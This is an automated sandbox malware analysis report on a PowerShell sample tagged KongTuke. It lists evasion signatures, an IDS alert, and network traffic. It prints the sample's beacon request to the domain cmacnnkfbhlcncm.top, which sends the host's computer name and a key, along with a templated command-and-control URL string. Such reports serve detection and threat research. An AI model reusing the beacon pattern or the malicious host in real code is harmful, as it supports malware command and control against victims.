Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579000
MD5:15c696b54fec704854a06052972d8da1
SHA1:ed686be71d4fd74a17b80d566d6d2303704ead3f
SHA256:54b46f36f001fa7f35af7bd1deaa1b835a3145b18feb98f2584c08220c2dc988
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 4580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4580, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4580, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-20T17:34:26.290036+010028593911Domain Observed Used for C2 Detected192.168.2.5552171.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 82.6% probability
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbd?? source: powershell.exe, 00000000.00000002.2234928744.000001AE719A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb@<+ source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2237767209.000001AE71DDD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2237361867.000001AE71D04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2234928744.000001AE719A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbh<S source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdb source: powershell.exe, 00000000.00000002.2236363325.000001AE71C3C000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.5:55217 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$a4j1wlqhkmzgpot67gw9l3qf0madz/$zs0pgc72wrmfea1.php?id=$env:computername&key=$frnyclkgbjpa&s=
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00C73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00C73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.comp
Source: powershell.exe, 00000000.00000002.2236363325.000001AE71C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.2236363325.000001AE71C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2222603419.000001AE102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2195883968.000001AE0226A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2222603419.000001AE102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00ECC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/year-in
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gif
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://blog.google/products/gemini/google-gemi
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F579F60_2_00007FF848F579F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F587A20_2_00007FF848F587A2
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ni-ai-holiday-planning-2024/%3Futm_source%3Dhpp%26utm_medium%3Dreferral&amp;source=hpp&amp;id=19046184&amp;ct=3&amp;usg=AOvVaw0wTMtITXLpc8KeH3Y4fICW&amp;sa=X&amp;ved=0ahUKEwj528LE47aKAxX8aPUHHTtsC80Q8IcBCAY" rel="nofollow">5 ways Gemini can help during the Holidays</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwj528LE47aKAxX8aPUHHTtsC80QnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.png" width="32"><a href="https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2024/%3Futm_source%3Dhpp%26utm_medium%3Dreferral&amp;source=hpp&amp;id=19046184&amp;ct=3&amp;usg=AOvVaw0wTMtITXLpc8KeH3Y4fICW&amp;sa=X&amp;ved=0ahUKEwj528LE47aKAxX8aPUHHTtsC80Q8IcBCAY" rel="nofollow">5 ways Gemini can help during the Holidays</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="smbdIYF5IF9vEWyRIGM7rw">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
